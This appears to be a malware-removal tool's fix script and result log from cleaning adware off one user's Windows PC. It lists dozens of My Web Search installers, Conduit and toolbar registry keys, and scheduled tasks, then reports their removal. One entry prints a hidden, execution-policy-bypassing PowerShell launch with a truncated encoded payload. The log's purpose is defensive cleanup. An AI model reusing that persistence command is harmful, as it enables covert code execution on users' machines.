2011-12-31 02:31 - 2011-12-31 02:31 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2138ca7d).exe
2012-01-18 10:47 - 2012-01-18 10:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(23633e70).exe
2011-09-28 21:30 - 2011-09-28 21:30 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(241d11a9).exe
2012-01-20 11:14 - 2012-01-20 11:14 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2dc97e34).exe
2011-09-10 09:35 - 2011-09-10 09:35 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(3641cf4c).exe
2011-08-23 22:07 - 2011-08-23 22:07 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(365b465f).exe
2011-10-11 17:07 - 2011-10-11 17:07 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(386da867).exe
2011-08-24 08:46 - 2011-08-24 08:46 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38a4d5bf).exe
2011-11-26 23:50 - 2011-11-26 23:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38da5692).exe
2011-11-28 06:12 - 2011-11-28 06:12 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(3f5e903a).exe
2011-10-13 15:47 - 2011-10-13 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(42715212).exe
2011-11-29 23:40 - 2011-11-29 23:40 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(48441ffa).exe
2011-11-30 23:09 - 2011-11-30 23:09 - 0091712 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(4d4e5d71).exe
2012-01-08 22:18 - 2012-01-08 22:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(4eaa8c83).exe
2012-01-11 01:03 - 2012-01-11 01:03 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(598e1f87).exe
2011-12-03 12:09 - 2011-12-03 12:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(5a656a9f).exe
2011-12-05 16:58 - 2011-12-05 16:58 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(65babd0e).exe
2011-12-06 19:09 - 2011-12-06 19:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(6b589e26).exe
2011-12-14 21:46 - 2011-12-14 21:46 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(951b3e56).exe
2010-09-04 17:23 - 2010-10-02 09:49 - 0000000 _____ () C:\Users\Lexi\AppData\Local\Okaducenafi.bin
2010-09-04 17:23 - 2010-10-02 15:59 - 0000120 _____ () C:\Users\Lexi\AppData\Local\Vvoqitamewiga.dat
2014-08-29 14:20 - 2014-08-29 14:20 - 0000000 _____ () C:\Users\Lexi\AppData\Local\{56FEC2D8-8D9A-4EBB-8F41-2EA297B30509}
2011-01-22 13:59 - 2011-01-22 13:59 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
C:\Users\Lexi\FileThisDesktopInstaller.exe
CustomCLSID: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Lexi\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => No File
Task: {0055D0AD-03B3-4D48-AFE3-A38C8C677968} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {019548C8-5866-4E43-947E-549EFB0E5BF0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
ask: {31BD4F86-0AC8-44F3-8311-6D5F6E437CE8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {3455E5EB-982F-4F37-A08F-2611B97362E4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {4874B179-27CF-4EF3-B6D5-9B73AC212125} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {62ECE67D-6CE1-4F21-8A41-AF981AFA9D32} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {8A8E57B1-1E98-4427-9E6A-C1300BA645D8} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {8D5BFBF8-B310-4BAC-AFAE-AB69A8B5B6B2} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {8E429196-FD32-44C9-A7D4-1F6A6049AEAA} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {901656D9-4A6A-484C-8071-772FE3370625} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {BFB2B30C-9AA7-4CF9-9102-4905A8D13BBF} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {DA52D331-0D67-4E23-8587-EBA2B65F4A46} - System32\Tasks\{7E7D0F47-0A78-0E0A-7A11-047E0C7E1178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9440 more characters).
AlternateDataStreams: C:\ProgramData\TEMP:443E07A5 [118]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
CMD: ipconfig /flushdns
EmptyTemp:
CMD: ipconfig /flushdns
EmptyTemp:
end
 
 
 
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetActiveDesktop => value removed successfully
KU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0 => Error: No automatic fix found for this entry.
"C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll" => Value data removed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt1" => key removed successfully
HKCR\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt2" => key removed successfully
HKCR\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt3" => key removed successfully
HKCR\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt4" => key removed successfully
HKCR\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\URLSearchHooks\\{8bdea9d6-6f62-45eb-8ee9-8a81af0d2f94} => value removed successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => key removed successfully
HKCR\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => key removed successfully
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{56256A51-B582-467e-B8D4-7786EDA79AE0}" => key removed successfully
HKCR\Wow6432Node\CLSID\{56256A51-B582-467e-B8D4-7786EDA79AE0} => key not found.
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => key removed successfully
HKCR\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2EDC592E-BE3B-45E6-9A09-3818FD7629D6}" => key removed successfully
HKCR\CLSID\{2EDC592E-BE3B-45E6-9A09-3818FD7629D6} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => key removed successfully
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{56256A51-B582-467e-B8D4-7786EDA79AE0}" => key removed successfully
HKCR\CLSID\{56256A51-B582-467e-B8D4-7786EDA79AE0} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{60C66211-88F6-486E-8303-B0B10E4FD293}" => key removed successfully
HKCR\CLSID\{60C66211-88F6-486E-8303-B0B10E4FD293} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B1243C39-DE64-4E02-BC80-265B7BD496B1}" => key removed successfully
HKCR\CLSID\{B1243C39-DE64-4E02-BC80-265B7BD496B1} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9D425283-D487-4337-BAB6-AB8354A81457}" => key removed successfully
HKCR\Wow6432Node\CLSID\{9D425283-D487-4337-BAB6-AB8354A81457} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F5580E24-8416-4DFD-90B3-078D4EDF4FCB}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{F5580E24-8416-4DFD-90B3-078D4EDF4FCB}" => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{A8C7C2CA-6DFD-4E16-8458-592361564D38} => value removed successfully
"HKCR\Wow6432Node\CLSID\{A8C7C2CA-6DFD-4E16-8458-592361564D38}" => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{9D425283-D487-4337-BAB6-AB8354A81457} => value removed successfully
HKCR\Wow6432Node\CLSID\{9D425283-D487-4337-BAB6-AB8354A81457} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{62cad681-699f-4f83-b87f-95584003592f} => value removed successfully
"HKCR\Wow6432Node\CLSID\{62cad681-699f-4f83-b87f-95584003592f}" => key removed successfully
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{9D425283-D487-4337-BAB6-AB8354A81457} => value removed successfully
HKCR\CLSID\{9D425283-D487-4337-BAB6-AB8354A81457} => key not found.
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} => value removed successfully
HKCR\CLSID\{8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} => key not found.
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{62CAD681-699F-4F83-B87F-95584003592F} => value removed successfully
HKCR\CLSID\{62CAD681-699F-4F83-B87F-95584003592F} => key not found.
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{A13C2648-91D4-4BF3-BC6D-0079707C4389} => value removed successfully
"HKCR\CLSID\{A13C2648-91D4-4BF3-BC6D-0079707C4389}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{2FF8D282-F78A-4A33-ABC2-49E72A341482}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{2FF8D282-F78A-4A33-ABC2-49E72A341482}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F}" => key removed successfully
Firefox "homepage" removed successfully
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\extension@Fast_Free_Converter.com => value removed successfully
C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com => moved successfully
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Mozilla\Firefox\Extensions\\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} => value removed successfully
C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} => moved successfully
idsvc => service removed successfully
wfpcapture => service removed successfully
wpcsvc => service removed successfully
C:\Users\Lexi\AppData\LocalLow\FunWebProducts => moved successfully
C:\Users\Lexi\AppData\LocalLow\Conduit => moved successfully
C:\Users\Lexi\AppData\Local\Conduit => moved successfully
C:\Program Files (x86)\Conduit => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00024cb8).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(000321b2).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00034114).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0003ec41).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00056cd5).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00073fec).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0008252c).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0008496e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(000b8b3e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(000c73a9).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00130f9a).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0018976e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00288d51).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(008db6d3).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00fc1d83).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(013e5cf4).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(01fc745e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(026211c7).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0431a317).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(04456972).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(054287ef).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(05af0912).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0827ae62).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0a233f94).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0cc139e7).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(106fb87b).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(134e6ebe).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(13f4b968).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1462a399).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1475ab09).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(14c57403).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(191ae0ef).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1bd14184).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1e0d189c).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1fa4da4d).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(2138ca7d).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(23633e70).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(241d11a9).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(2dc97e34).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(3641cf4c).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(365b465f).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(386da867).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(38a4d5bf).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(38da5692).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(3f5e903a).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(42715212).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(48441ffa).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(4d4e5d71).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(4eaa8c83).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(598e1f87).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(5a656a9f).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(65babd0e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(6b589e26).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(951b3e56).exe => moved successfully
C:\Users\Lexi\AppData\Local\Okaducenafi.bin => moved successfully
C:\Users\Lexi\AppData\Local\Vvoqitamewiga.dat => moved successfully
C:\Users\Lexi\AppData\Local\{56FEC2D8-8D9A-4EBB-8F41-2EA297B30509} => moved successfully
C:\ProgramData\ezsidmv.dat => moved successfully
C:\Users\Lexi\FileThisDesktopInstaller.exe => moved successfully
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0055D0AD-03B3-4D48-AFE3-A38C8C677968}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0055D0AD-03B3-4D48-AFE3-A38C8C677968}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{019548C8-5866-4E43-947E-549EFB0E5BF0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{019548C8-5866-4E43-947E-549EFB0E5BF0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
ask: {31BD4F86-0AC8-44F3-8311-6D5F6E437CE8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION => Error: No automatic fix found for this entry.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3455E5EB-982F-4F37-A08F-2611B97362E4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3455E5EB-982F-4F37-A08F-2611B97362E4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4874B179-27CF-4EF3-B6D5-9B73AC212125}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4874B179-27CF-4EF3-B6D5-9B73AC212125}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{62ECE67D-6CE1-4F21-8A41-AF981AFA9D32}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62ECE67D-6CE1-4F21-8A41-AF981AFA9D32}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8A8E57B1-1E98-4427-9E6A-C1300BA645D8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8A8E57B1-1E98-4427-9E6A-C1300BA645D8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8D5BFBF8-B310-4BAC-AFAE-AB69A8B5B6B2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8D5BFBF8-B310-4BAC-AFAE-AB69A8B5B6B2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8E429196-FD32-44C9-A7D4-1F6A6049AEAA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8E429196-FD32-44C9-A7D4-1F6A6049AEAA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{901656D9-4A6A-484C-8071-772FE3370625}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{901656D9-4A6A-484C-8071-772FE3370625}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BFB2B30C-9AA7-4CF9-9102-4905A8D13BBF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BFB2B30C-9AA7-4CF9-9102-4905A8D13BBF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DA52D331-0D67-4E23-8587-EBA2B65F4A46}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DA52D331-0D67-4E23-8587-EBA2B65F4A46}" => key removed successfully
C:\WINDOWS\System32\Tasks\{7E7D0F47-0A78-0E0A-7A11-047E0C7E1178} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7E7D0F47-0A78-0E0A-7A11-047E0C7E1178}" => key removed successfully
C:\ProgramData\TEMP => ":443E07A5" ADS removed successfully.
"C:\Users\Lexi\Documents\be you.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\be you.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\be you.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\beyoubravely.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\beyoubravely.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\beyoubravely.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
